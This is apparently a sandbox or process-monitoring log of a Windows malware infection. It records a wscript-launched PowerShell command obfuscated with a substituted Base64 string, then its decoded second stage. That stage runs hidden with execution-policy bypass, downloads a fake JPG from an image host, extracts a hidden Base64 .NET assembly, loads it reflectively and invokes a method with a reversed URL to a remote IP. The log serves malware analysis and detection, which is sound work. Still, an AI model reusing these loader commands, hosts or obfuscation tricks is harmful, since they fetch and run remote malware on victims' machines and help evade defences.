parent_process wscript.exe martian_process powershell -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$method.Invoke($null, $arguments)"
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe